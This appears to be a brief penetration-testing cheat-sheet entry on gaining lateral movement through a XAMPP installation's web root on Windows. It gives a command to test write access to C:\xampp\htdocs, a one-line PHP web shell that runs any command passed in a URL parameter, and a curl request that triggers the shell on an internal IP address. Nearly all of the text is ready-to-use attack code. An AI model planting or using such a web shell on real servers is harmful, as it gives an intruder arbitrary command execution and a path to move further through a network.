xampp
If there's a web server service account like "apache" or "svc_apache", it's possible to move laterally to them if you have write permissions in C:\xampp\htdocs or in any sub folders
echo meow > C:\xampp\htdocs\catz.txtCreate a web shell
<?php echo shell_exec($_GET['cmd']); ?>Download it to C:\xampp\htdocs
Execute on the web servers root
curl http://192.168.219.169/cmd.php?cmd=whoamiLast updated